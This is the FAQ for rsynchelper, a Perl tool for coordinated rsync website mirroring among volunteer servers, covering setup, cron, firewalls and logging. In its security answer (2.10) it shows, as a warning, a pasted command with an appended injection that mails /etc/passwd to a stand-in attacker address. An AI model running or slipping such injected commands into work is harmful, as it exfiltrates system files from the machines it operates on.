Welcome to rsynchelper.

Here is the FAQ (also included in the source code).



                        rsynchelper README

Version: $Id: FAQ,v 1.1 2001/02/27 09:10:28 saralin Exp $
Copyright Sara Lin 
Released under GPL - see LICENCE 

1. Questions for people thinking about installing rsynchelper
2. Details on mirroring a site from another server
3. Details on asking servers in your buddylist to mirror a site on your server

-------------------------------------------------------------------
1. Questions for people thinking about installing rsynchelper

1.1) What is mirroring?  Why mirror?
1.2) rsynchelper in non-technical language.
1.3) What are the pre-requisites for using rsynchelper?
1.4) rsynchelper in technical language.

1.5) Is it a lot of work to be a mirror?  What are the downsides?
1.6) Sounds good -- how do I become a mirror?
     What is the install process?
1.7) Joining or setting up a buddylist

-------------------------------------------------------------------
2. Details on mirroring a site from another server

2.1) I've gotten a request to mirror a site -- what do I do?
2.2) I don't want to choose what I mirror on a site-by-site basis.
     Can I set up broader mirroring to servers I trust?
2.6) I'm having problems mirroring -- what should I do?
2.7) I run NT, can I participate?
2.8) I can view my own rsync server modules, but other people can't view mine,
     or I can't view other people's.  Is there a firewall issue?
2.9) I have an existing /etc/rsyncd.conf - can I safely install this program?
2.10) Is rsynchelper secure? Are there any security issues?
2.11) Why doesn't rsynchelper use ssh?
2.12) I think I've mirrored a site, but how can I tell?
2.13) Do I have to be in a certain directory to run rsynchelper?  
      Do I run it as a certain user?

-------------------------------------------------------------------
3. Details on asking servers in your buddylist to mirror a site on your server

3.1) How do I get other hosts to mirror a site?

3.2) How does a member of the public get to the mirrored site?
     What is the mirrored site's new URL?

3.3) I want servers to stop mirroring my site, what do I do?

3.4) How do I convert non-mirrorable absolute links to relative links?

3.5) How do I know that another host successfully mirrored from me?
     Where is a log of who has mirrored my site?  

==========================================================================
---- Answers
==========================================================================

1.1) What is mirroring?  Why mirror?

A simple definition of mirroring: 
"When one server makes an exact copy of the content on another server."

Why mirror?  These are a few possible motives:
a) make a closer copy of the content to make downloads faster
b) join the bandwidth capacity of several servers to cope with popular sites
c) demonstrate support for the content
d) defend against suppression of the content

Popular open-source software projects are the most frequent users of
mirrors.  Controversial web sites, such as those covering human rights
or corporate whistle-blowing, also use mirroring.  rsynchelper is only a
generic tool -- you are responsible for your own choices of what content
to mirror.

1.2) rsynchelper in non-technical language.

rsynchelper is designed to make it easy for a loose group of mirrors to
set up mirroring quickly, time and time again.

rsynchelper makes it easier to use mirroring.  rsynchelper:
a) makes it easier to make your content available for others to mirror
b) makes it easier to mirror someone else's content
c) automates maintaining an accurate list of who is mirroring which content

It takes about 5-10 minutes to set up rsynchelper the first time.  Each
time a server in a buddy network gets a request to mirror a site, its
administrator can set up the mirroring simply by cutting and pasting a
single command (less than a minute).

Each member of the mirror network chooses whether or not to mirror
each site.  There is an automatically generated and often widely
distributed list of which servers are mirroring each site.

1.3) What are the pre-requisites for using rsynchelper?

rsynchelper helps linux/unix computers use the mirroring program rsync.
rsync can be found at http://rsync.samba.org/ -- 
it is the state of the art for efficiently synchronizing files between servers.

To use rsynchelper to mirror others you only need perl and rsync.

To make your information available to others, you need root access 
and must NOT have the rsync port blocked by a firewall.

1.4) rsynchelper in technical language.

A server (host X) asks others on the buddylist:
"Please mirror the site called 'site1' from me."

A server Y chooses to mirror the site and runs the command:
  rsynchelper hostX::mirror_me/site1 /hostX/

This copies files from host X to host Y and puts them in a directory
on host Y.  To get to the site, the general public will then go to
  http://hostY/mirrors/hostX/site1 

For more on how this works, read Section 2 of this FAQ.
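
As a rough sketch of the path mapping just described (this is not
rsynchelper's actual code): the helper names below and the
/var/www/mirrors root are assumptions made for illustration.  Only the
hostX, hostY and site1 names come from the example above.

```shell
#!/bin/sh
# Hypothetical helpers: show where a mirrored site ends up on host Y.

# local_mirror_dir MIRRORS_ROOT SOURCE DEST
#   MIRRORS_ROOT  directory your web server exports (assumed value)
#   SOURCE        e.g. hostX::mirror_me/site1
#   DEST          e.g. /hostX/
local_mirror_dir() {
    root=${1%/}      # drop one trailing slash from the root
    site=${2##*/}    # last path component of the source, e.g. site1
    dest=${3#/}      # drop the leading slash of the destination
    dest=${dest%/}   # drop the trailing slash of the destination
    printf '%s/%s/%s\n' "$root" "$dest" "$site"
}

# public_mirror_url MIRROR_HOST SOURCE DEST
#   Same mapping, expressed as the URL the public would visit.
public_mirror_url() {
    printf 'http://%s\n' "$(local_mirror_dir "$1/mirrors" "$2" "$3")"
}
```

With the values from the example,
  public_mirror_url hostY hostX::mirror_me/site1 /hostX/
prints http://hostY/mirrors/hostX/site1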

To review what a single server needs to participate in a mirror network:

a) To be able to mirror others, you use the program 'rsync'.
b) To set up regular mirroring, you run rsync via cron.
c) To have other servers mirror you, you need to run  
   the rsync server 'rsyncd', and edit /etc/rsyncd.conf 

rsynchelper has two pieces -- an installer and a script:

a) the installer configures your computer to be an rsync server, i.e. it
   edits, when needed, /etc/rsyncd.conf, /etc/services and /etc/inetd.conf.
   By default, it links the rsync module 'mirrors' to a directory 
   available to your webserver.

b) the perl script rsynchelper simplifies common mirroring tasks
   via rsync and cron.  It helps beginning unix administrators
   to easily act as mirrors.

There is another script, 'mirrorlist', that plays a supporting
role.  Not every server running rsynchelper needs to run
mirrorlist.  mirrorlist polls a list of servers and creates an
up-to-date list of which servers are mirroring each site on the list.

1.5) Is it a lot of work to be a mirror?  What are the downsides?

TO INSTALL:   After skimming this document, it will take less than 5 minutes
              to install rsynchelper.  If you need to install rsync, that will 
              also only take a few minutes.  If you need to open up your 
              firewall to allow access to rsyncd, this will take additional
              time, depending on local setup and skill.

TO MAINTAIN:  When a site comes up for protection, and you want to 
              mirror that site, it will only take cutting and pasting
              one command from an email message to start mirroring the site.

SYSTEM USAGE: The first time you mirror a site, you download the whole site. 
              Each night, your cronjob downloads only the changes, often 
              less than 1% of the size of the whole site.
              Some people will web-browse your mirror.
              Most visitors will go to the mirrors they 
              perceive as being high-bandwidth/fast sites, so visitors will
              probably not consume too much bandwidth.

TIME:         It takes some time to monitor a buddylist listserv
              and decide whether you want to mirror a site.  Some content
              may not be appropriate for your server.  Most buddylist
              listservs have very low traffic.
             
1.6) Sounds good -- how do I become a mirror?
     What is the install process?

To install:
 
a) get the latest version of the source code from
   http://sourceforge.net/files/project=xxxx

b) install rsynchelper
   gunzip -c rsynchelper-x.tar.gz | tar xf -
   cd rsynchelper && perl install.pl # on some systems: perl5 install.pl

c) possibly open up your firewall
   You may need to open up your firewall to allow other people
   to mirror sites from you via rsync.  If you have a firewall, see FAQ 2.8

d) join or set up a buddylist
   see FAQ 1.7

1.7) Joining or setting up a buddylist

rsynchelper is designed to make it easy for a group of servers
(a buddylist) to join together repeatedly in mirroring sites.

There are two buddylist aspects to mirroring:
* Getting on a mailinglist where new requests for mirroring are posted
* Having your server be automatically 'polled' to see what sites are
  being mirrored.

To join a buddylist, you
a) install rsynchelper
b) join a mailinglist for a buddylist
c) send your configuration to the mirrorlist servers, who will poll you

To set up a new buddylist, you
a) install rsynchelper on several servers
b) install mirrorlist on one or more servers
c) create a mailinglist for people to join
d) ask others to join your buddylist by 
   publicizing the email address for the maintainers of b) and c)

If you run a server at a university, business, or as an individual,
you probably want to join an existing buddylist.  Each buddylist is
independent, so you need to find the homepage of the buddylist(s) that
you are interested in.  Generally people reading this document will do
so from a buddylist homepage.  Some buddylist homepages are listed:
  http://rsynchelper.sourceforge.net/external_links/

If you are an association of servers, or are concerned with a
particular type of content not served by existing buddylists, you may
want to set up your own buddylist.  After it is up and running, you may
want to add your list to:
  http://rsynchelper.sourceforge.net/external_links/

--------------------------------------------------------------------
2.1) I've gotten a request to mirror a site -- what do I do?

If you join a buddylist listserv, you will get requests from servers
to mirror their sites.  If you choose to mirror the site, cut and
paste the rsynchelper command they suggest.

They will probably suggest you run a command like:
   rsynchelper -c server.org::mirror_me/test1 /server.org/

The -c option will semi-automatically set up ongoing mirroring
(by putting the rsynchelper command in cron).

You may want to edit your crontab manually.  In that case, do not
use -c; use -v instead to see the suggested crontab entry, like
   rsynchelper -v server.org::mirror_me/test1 /server.org/

The crontab entry will look something like this:
0 1 * * * rsynchelper server.org::mirror_me/test1 /server.org/

This will be in the crontab of the user who owns the mirror_me
directory.  This user is usually 'nobody', but you pick this user when
you run install.pl
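
If you edit the crontab by hand, the entry can be generated rather than
typed.  The following is a minimal sketch; the function name cron_line
is made up for this example, and the schedule (on the hour, every night)
simply copies the sample entry above.

```shell
#!/bin/sh
# cron_line HOUR SOURCE DEST
# Print a crontab entry that re-runs the mirror every night at HOUR:00.
cron_line() {
    printf '0 %s * * * rsynchelper %s %s\n' "$1" "$2" "$3"
}

# To append the entry to a crontab, run something like the following as
# the user who owns the mirror_me directory (left as a comment so nothing
# is changed by accident):
#   (crontab -l 2>/dev/null; cron_line 1 server.org::mirror_me/test1 /server.org/) | crontab -
```

Running "crontab -l" afterwards shows whether the entry was added.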

2.2) I don't want to choose what I mirror on a site-by-site basis.
     Can I set up broader mirroring to servers I trust?

     Yes. You have two options for 'trust' based automation.

     A) To mirror all sites, for example, that server.org ASKS 
     you to mirror, do:
       rsynchelper server.org::mirror_me/* /server.org/

     B) You can also play 'follow the leader', and mirror the same sites that 
     another server mirrors.  For example, to mirror everything that server.org
     mirrors from other people, do: 
       rsynchelper server.org::mirrors/* /

2.6) I'm having problems mirroring -- what should I do?

   Contact your buddylist listserv or technical contact for help.
   If you are a buddylist technical contact, you should join
   rsynchelper-techies@lists.sourceforge.net where you can give and receive
   advice.

   You may also want to read up on rsync, as the mirror system is built on
   it.  Read 'man rsync' and 'man rsyncd.conf'.
   The rsync homepage has a number of good tutorials, including
      http://www.eunuchs.org/linux/rsync/

2.7) I run NT, can I participate?

Not yet.  rsynchelper would need to be ported to NT.

rsync runs fine on NT.  You can participate if you want to port
rsynchelper.pl to NT.  rsynchelper is a perl script, which can work on
NT; however, the paths to $mirrors and $rsync_bin would have to be
edited, and the cron handling would have to be replaced.

The install.pl program will not work, as it relies too much on a UNIX
environment.

2.8) I can view my own rsync server modules, but other people can't view mine,
     or I can't view other people's.  Is there a firewall issue?

There is probably a firewall issue.
For your rsync server to be visible, TCP port 873 needs to be open.
Only reconfigure your firewall if you know what you are doing!
On a Cisco system, you would add something like this line (replacing 192...)

access-list 101 permit tcp any host 192.168.1.33 eq 873

On a computer that uses ipchains, if the default input policy to your
host is DENY, you may open the port with:

ipchains -I input -d  192.168.1.33 873 -p tcp -j ACCEPT

(replace the IP number above with your host's IP)

2.9) I have an existing /etc/rsyncd.conf - can I safely install this program?

Yes.  Keep a backup copy of /etc/rsyncd.conf, and then run install.pl.
Then look at /etc/rsyncd.conf.  Do the modules look OK?
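
One way to check the modules is to list the section headers before and
after the install.  This is only a sketch: list_modules is a
hypothetical helper, and the backup file name is an arbitrary choice.
It relies on the fact that each module in rsyncd.conf starts with a
[name] line.

```shell
#!/bin/sh
# list_modules FILE
# Print the module names (the [name] section headers) found in an
# rsyncd.conf-style file, one per line.
list_modules() {
    sed -n 's/^[[:space:]]*\[\([^]]*\)].*$/\1/p' "$1"
}

# Typical use around the installer (left as comments so nothing is
# changed by accident):
#   cp -p /etc/rsyncd.conf /etc/rsyncd.conf.before-rsynchelper
#   perl install.pl
#   diff /etc/rsyncd.conf.before-rsynchelper /etc/rsyncd.conf
#   list_modules /etc/rsyncd.conf
```

Any module you had before the install should still be in the list,
alongside whatever the installer added.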

2.10) Is rsynchelper secure? Are there any security issues?

The most obvious danger with rsynchelper is that people often use it 
in conjunction with a mailinglist -- they get requests from the mailinglist
to mirror a site and cut and paste the rsynchelper command onto the
command line.  Whenever you run a command, you should look carefully at
the command.

It is fine if the command looks like:
 rsynchelper -c server.org::mirrors/site1 /server.org/

But don't run it if it looks like:
 rsynchelper -c s.org::mirrors/1 /s/ ; Mail -s1 1@cracker.org < /etc/passwd

Also, look at the second argument -- is it normal, or does it contain 
special characters?  Don't run the command if you are suspicious.
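
A mechanical pre-check can catch the obvious cases before you paste.
The sketch below is deliberately conservative and is no substitute for
reading the command yourself.  The function name and the list of
allowed characters are assumptions of this example, and the wildcard
forms from FAQ 2.2 would be rejected and need a manual look.

```shell
#!/bin/sh
# looks_like_plain_command "COMMAND LINE"
# Succeeds only if the text starts with "rsynchelper " and contains
# nothing but letters, digits, spaces and the characters . _ : / -
# Shell metacharacters such as ; | < > & $ ` and quotes make it fail.
looks_like_plain_command() {
    case $1 in
        "rsynchelper "*) ;;      # must begin with the rsynchelper command
        *) return 1 ;;
    esac
    # Delete every allowed character; anything left over is suspicious.
    leftover=$(printf '%s' "$1" | tr -d 'A-Za-z0-9 ._:/-')
    [ -z "$leftover" ]
}
```

Pass the pasted text in single quotes so that your shell does not
interpret it, for example:
  looks_like_plain_command 'rsynchelper -c server.org::mirrors/site1 /server.org/' && echo "looks plain"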

Basically, rsynchelper's use of rsync is as secure as rsync itself.
The remaining risk is undiscovered bugs in rsync, such as buffer overflows.

2.11) Why doesn't rsynchelper use ssh?

Summary of the issue:  rsh is badly broken, and often opens up security
holes.  ssh is a drop-in replacement for rsh, which is both more secure
AND encrypts traffic.  rsynchelper uses rsync in the special rsync-server
mode.  This mode does not use either ssh or rsh.  This mode is not
vulnerable to the same problems as rsh.  However, this mode does not
encrypt traffic.  Luckily, in our case, the traffic is publicly
available webpages.

We don't run rsync over ssh because then servers would need accounts on
each other (for ssh logins).  Most big mirror networks use the special
rsync server mode that we use.

2.12) I think I've mirrored a site, but how can I tell?

The simplest thing is to run rsynchelper with the
-v option the first time you mirror the site.
It will show you the files it is copying.

With or without the -v option, rsynchelper should
tell you if it runs into trouble.

You can also just look in the file system and see whether or not the
new site has been mirrored to your server.

If you ran the command
 rsynchelper server.org::mirrors/site1 /server.org/

Then, there should be a directory full of files at:
  $mirrors/server.org/site1 
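
The same check can be scripted.  This is a minimal sketch:
mirror_has_files is a hypothetical helper, and you pass it the real
directory yourself, since the value of $mirrors depends on your install.

```shell
#!/bin/sh
# mirror_has_files DIR
# Succeeds if DIR exists and contains at least one regular file
# somewhere below it; fails for a missing or empty directory.
mirror_has_files() {
    [ -d "$1" ] && [ -n "$(find "$1" -type f | head -n 1)" ]
}
```

For example, with an assumed mirrors directory of /var/www/mirrors:
  mirror_has_files /var/www/mirrors/server.org/site1 && echo "mirrored"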


2.13) Do I have to be in a certain directory to run rsynchelper?  
      Do I run it as a certain user?

You do NOT have to be inside the correct directory before running
rsynchelper.  One of the jobs of rsynchelper is to set up the correct
environment for rsync.  You can run rsynchelper as either root or the
correct user.  If it is run as root, it will switch to the user
specified in /etc/rsynchelper.conf

--------------------------------------------------------------------
Publishing Threatened Sites

3.1) How do I get other hosts to mirror a site?

Put mirror-able files in a subdirectory of your mirror_me directory.

HTML files will need to use relative links, or they won't mirror well.
If your HTML files use absolute links, see FAQ 3.4

Email the mailinglist to let people know you want mirrors.  Tell
people the commands to run to mirror your site.

-start of email-
Please run this command to immediately mirror us:
 rsynchelper -c rsync://my.server.org/sitename /my.server.org/

This site is about xxx, and is size xxx.
-end of email-

If you are concerned about authentication, PGP sign your message 
and say where people can go to get your public key.

3.2) How does a member of the public get to the mirrored site?
     What is the mirrored site's new URL?

Once a site has been mirrored, the public still needs to view
an 'index' page that lists where the mirrors are.  Some 'indexing servers'
poll all the servers in a buddylist and assemble a list of who is 
mirroring what.

3.3) How do I get servers to stop mirroring my site?

Email your buddylist and ask people to run, for example,  
 rsynchelper -R rsync://my.server.org/sitename /my.server.org/

Some people may require that you PGP sign your 'stop' request to 
prevent vandals from forging a stop request.

3.4) How do I convert non-mirrorable absolute links to relative links?

You can use w3mir or wget.

The wget manual explains how to do this under 'Directory Options'.
  http://www.gnu.org/manual/wget/index.html

Here is a summary:

# create a directory to hold the converted files, for example:
mkdir /tmp/local_links
cd    /tmp/local_links

wget -r -k -nH http://some.virtual.com/
# or, if the original site is already in a subdirectory
wget -r -k -nH --cut-dirs=1 http://some.host.com/somedir/index.html

3.5) How do I know that another host successfully mirrored from me?
    Where is a log of who has mirrored my site?

By default, rsyncd logs to the syslog daemon, which in turn logs
different types of messages to different log files. On my laptop, this
means that I get informational messages about rsync transfers in
/var/log/messages , but the exact logfile will depend on your
/etc/syslog.conf

You can also specify a log file directly in /etc/rsyncd.conf.

Read 'man rsyncd.conf' for how to customize logging.  'man
syslog.conf' may be helpful if you are trying to understand syslog for
the first time.
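
To pull the rsync entries out of a shared syslog file, a filter along
these lines may help.  It is a sketch that assumes the daemon's lines
are tagged "rsyncd[PID]", which is the usual syslog form; check a few
lines of your own log first.  The function name is made up for this
example.

```shell
#!/bin/sh
# rsyncd_log_lines LOGFILE
# Print only the lines of LOGFILE written by the rsync daemon,
# assuming they carry the tag "rsyncd[PID]".
rsyncd_log_lines() {
    grep 'rsyncd\[' "$1"
}
```

For example, on a machine that logs to /var/log/messages:
  rsyncd_log_lines /var/log/messages | tail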